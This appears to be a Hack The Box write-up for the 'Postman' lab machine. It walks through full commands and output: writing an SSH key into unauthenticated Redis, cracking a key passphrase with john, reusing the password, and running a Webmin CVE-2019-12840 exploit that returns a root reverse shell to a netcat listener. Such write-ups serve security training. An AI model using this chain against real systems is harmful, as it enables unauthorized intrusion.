HTB: Postman

Details

This machine is Postman from Hack The Box

Recon

A simple nmap scan to start

root@kali:~# nmap -sV -p- 10.10.10.160
Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-05 13:24 EST
Nmap scan report for 10.10.10.160
Host is up (0.046s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.90 seconds

So a few services to check

User

I started with port 80

Screenshot 1

Then port 10000

Screenshot 2

Tried again on https://10.10.10.160:10000/

Screenshot 3

I didn't have any creds for this, so I started to look at the redis, which led me to the following post https://medium.com/@Victor.Z.Zhu/redis-unauthorized-access-vulnerability-simulation-victor-zhu-ac7a71b2e419. So I generated an ssh key and gave it a go

root@kali:~# (echo -e "\n\n"; cat redis.pub; echo -e "\n\n") > temp.txt

root@kali:~# cat /tmp/temp.txt | redis-cli -h 10.10.10.160 -x set s-key
OK

root@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> 

So I checked if the key was set

10.10.10.160:6379> get s-key
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDarNi2dnMEiBDCWDw1KSeXjqYziw31NcNKgJjXJ0xXAVk9E/Ag6mpfvo3bd6kcadnlbcIOeUrTlrOkjkm4qeyIDtAYfrqIeQw4koBWybuvz81ALRfn8wXuvomLxf/Oxct2qwPU/Hk7U00gbGvAUkiiI+96uu4Bnv60kSEpGcNuiS90daygwXfHF6EzA7NSPXu4QPMOeP7MGZckzpkOKUbFTudTNulCeMaZ0tLvVJFqGr6kzkUm346mm8lzAqe1veIXJTbig0SRh+FABWToGcSzT6vUe2lE62Td0CxjDuOvCh/rB2Ur6KQcZQajtKqt+UfLz4UIPiRMDK8ZRd7SdziOfrrssJ0Zl+HEMWA/2N7d8KPibM/W520oSwhPehA/4abQz/3W+wK3D1n4izQKNqnfbXvp7Zm5tB3eP6q6M+2o6XLk3Li6LzxycD6OcY9W4NBbrhD+fyIV69O2A5uBKZ4yKr9YK+wTN/PM/EUT0Y2BZsUj7eQ/mnlEX7zsVC5GDEk= root@kali\n\n\n\n"

And then the directories I could work with

10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"

So I set the directory and filename to be for ssh

10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK

10.10.10.160:6379> config set dbfilename "authorized_keys"
OK

10.10.10.160:6379> save
OK

The ssh key should have been written, so I tried to ssh in

ssh redis@10.10.10.160 -i ./redis
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Dec 24 12:48:40 2019 from 10.10.14.13
redis@Postman:~$ 

I found the user flag was in the home directory of a user called Matt

redis@Postman:/home/Matt$ ls -la
total 52
drwxr-xr-x 6 Matt Matt 4096 Sep 11 11:28 .
drwxr-xr-x 3 root root 4096 Sep 11 11:27 ..
-rw------- 1 Matt Matt 1676 Sep 11 11:46 .bash_history
-rw-r--r-- 1 Matt Matt  220 Aug 25 15:10 .bash_logout
-rw-r--r-- 1 Matt Matt 3771 Aug 25 15:10 .bashrc
drwx------ 2 Matt Matt 4096 Aug 25 18:20 .cache
drwx------ 3 Matt Matt 4096 Aug 25 23:23 .gnupg
drwxrwxr-x 3 Matt Matt 4096 Aug 25 23:29 .local
-rw-r--r-- 1 Matt Matt  807 Aug 25 15:10 .profile
-rw-rw-r-- 1 Matt Matt   66 Aug 26 00:48 .selected_editor
drwx------ 2 Matt Matt 4096 Aug 26 00:04 .ssh
-rw-rw---- 1 Matt Matt   33 Aug 26 03:07 user.txt
-rw-rw-r-- 1 Matt Matt  181 Aug 25 18:22 .wget-hsts

And also found a protected ssh key in /opt

redis@Postman:/opt$ ls -la
total 12
drwxr-xr-x  2 root root 4096 Sep 11 11:28 .
drwxr-xr-x 22 root root 4096 Aug 25 15:03 ..
-rwxr-xr-x  1 Matt Matt 1743 Aug 26 00:11 id_rsa.bak

redis@Postman:/opt$ cat id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

I saved the key locally to try and crack the passphrase

root@kali:~# /usr/share/john/ssh2john.py targetkey > crack.txt

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (targetkey)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:09 DONE (2019-12-24 07:54) 0.1071g/s 1537Kp/s 1537Kc/s 1537KC/sa6_123..*7¡Vamos!
Session completed

With the passphrase now cracked, I tried the key for accessing the Matt user

ssh Matt@10.10.10.160 -i targetkey
Enter passphrase for key 'targetkey':
Connection closed by 10.10.10.160 port 22

ssh auto closed, so I tried the passphrase for the key, as Matts password instead

redis@Postman:/opt$ su Matt
Password:
Matt@Postman:/opt$

I could now grab the user flag

Matt@Postman:~$ cat user.txt
[REACTED]

Root

Having seen there was password reuse already, I went back to the webmin on port 10000 and tried

Matt : computer2008

Screenshot 4

In my previous research I had found CVE-2019-12840, but it required auth. I now had that so I found an exploit for it https://github.com/roughiz/Webmin-1.910-Exploit-Script which I saved, then set a listener

root@kali:~# nc -nlvp 4444

root@kali:~# python webmin_exploit.py --rhost 10.10.10.160 --lhost 10.10.14.13 --lport 4444 -u Matt -p computer2008 -s True
****************************** Webmin 1.910 Exploit By roughiz*******************************
*********************************************************************************************
*********************************************************************************************
*********************************************************************************************
****************************** Retrieve Cookies sid *****************************************

********** [+] [Exploit] The Cookie is ba0bbd08f06ad787bda08dbcc3288115

********************************************************************************************
****************************** Create payload and Exploit ***********************************

********** [+] [Exploit] Verify you nc listener on port 4444 for the incomming reverse shell

And checking the listener

connect to [10.10.14.13] from (UNKNOWN) [10.10.10.160] 58644

I had a connect back, I tried running id to test if it was a shell

# id
uid=0(root) gid=0(root) groups=0(root)

It was a root shell, all that was left was the flag

# ls -la /root
total 76
drwx------  8 root root  4096 Oct 25 16:44 .
drwxr-xr-x 22 root root  4096 Aug 25 15:03 ..
-rw-------  1 root root 14351 Dec 24 13:08 .bash_history
-rw-r--r--  1 root root  3106 Apr  9  2018 .bashrc
drwx------  2 root root  4096 Aug 24 11:54 .cache
drwx------  3 root root  4096 Aug 26 00:50 .gnupg
-rw-------  1 root root    28 Oct 25 13:07 .lesshst
drwxr-xr-x  3 root root  4096 Aug 24 11:54 .local
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rw-------  1 root root    79 Aug 25 22:32 .rediscli_history
-rw-r--r--  1 root root    66 Oct 25 15:06 .selected_editor
drwx------  2 root root  4096 Aug 25 17:23 .ssh
drwxr-xr-x  2 root root  4096 Aug 25 16:08 .tmp
-rw-------  1 root root  1374 Oct 25 16:44 .viminfo
drwxrwxr-x  6 root root  4096 Oct  2 23:15 redis-5.0.0
-rw-r--r--  1 root root    33 Aug 26 03:32 root.txt

# cat /root/root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.